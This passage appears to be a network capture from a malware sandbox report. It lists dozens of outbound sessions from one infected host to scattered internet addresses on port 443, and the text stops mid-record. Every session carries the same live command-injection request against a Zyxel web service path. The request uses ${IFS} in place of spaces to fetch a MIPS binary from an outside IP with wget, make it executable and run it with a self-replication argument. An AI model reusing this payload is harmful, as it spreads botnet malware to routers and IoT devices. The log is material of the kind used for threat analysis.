                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587132931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7398192.168.2.2349032182.168.164.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587181091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7399192.168.2.233867843.30.79.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587229013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7400192.168.2.23514829.88.220.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587260008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7401192.168.2.2339772194.75.243.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587306023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7402192.168.2.2355634119.55.154.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587357044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7403192.168.2.2357988218.150.70.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587410927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7404192.168.2.2340638160.247.39.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587445974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7405192.168.2.23482684.140.127.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587506056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7406192.168.2.234882637.55.226.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587570906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7407192.168.2.2357620223.220.221.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587600946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7408192.168.2.2349304203.26.60.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587650061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7409192.168.2.235734445.115.11.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587686062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7410192.168.2.2340430140.20.184.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587721109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7411192.168.2.23536528.50.204.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587783098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7412192.168.2.235802482.157.56.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587809086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7413192.168.2.2345460213.55.182.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587840080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7414192.168.2.2338196137.198.145.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587894917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7415192.168.2.235468613.172.42.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587925911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7416192.168.2.2346854186.95.222.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.587977886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7417192.168.2.235593454.114.5.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588113070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7418192.168.2.234609243.252.102.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588139057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7419192.168.2.2357804169.17.171.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588165045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7420192.168.2.234960275.183.235.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588206053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7421192.168.2.233607061.44.132.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588247061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7422192.168.2.2345526106.180.225.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588293076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7423192.168.2.2340922116.189.119.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588339090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7424192.168.2.2352556217.7.65.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588391066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7425192.168.2.2341392175.29.109.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588408947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7426192.168.2.2337626144.123.66.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588438034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7427192.168.2.2345324141.112.136.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588490963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7428192.168.2.2348740102.70.68.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588540077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7429192.168.2.2352716171.227.86.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588566065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7430192.168.2.2347762150.66.183.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588598967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7431192.168.2.2337478219.178.208.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588670015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7432192.168.2.2337430219.175.17.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588697910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7433192.168.2.2351850185.207.119.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588737965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7434192.168.2.2345034181.84.114.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588783026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7435192.168.2.2356574137.190.171.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588841915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7436192.168.2.2357582135.249.242.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588872910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7437192.168.2.2360264185.109.62.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588943005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7438192.168.2.2338122222.127.4.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588948965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7439192.168.2.2343788168.238.13.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.588984013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7440192.168.2.2339752178.65.219.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.589011908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7441192.168.2.233680638.72.142.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.589082003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7442192.168.2.2336362142.140.71.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.589104891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7443192.168.2.235210693.111.78.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.589164019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7444192.168.2.2340458102.67.188.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.589214087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7445192.168.2.2360306147.69.171.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.589266062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7446192.168.2.2356118161.105.84.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.589291096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7447192.168.2.2357238113.8.219.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.589360952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7448192.168.2.2354858154.12.180.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.589406967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7449192.168.2.23599965.246.145.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.589457035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7450192.168.2.2350666104.26.134.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.589477062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7451192.168.2.2354788176.165.61.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.589551926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7452192.168.2.2356536132.156.222.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.589551926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7453192.168.2.234137040.22.34.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.589598894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7454192.168.2.2336264131.65.159.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.589649916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7455192.168.2.233892843.109.99.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.589715958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7456192.168.2.2341206196.4.106.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.589752913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7457192.168.2.235422819.140.214.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.589838982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7458192.168.2.2356326140.177.6.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.589863062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7459192.168.2.235623258.12.234.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.589880943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7460192.168.2.2335398159.93.162.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.589939117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7461192.168.2.2349670204.75.67.64443
                                                TimestampBytes transferredDirectionData
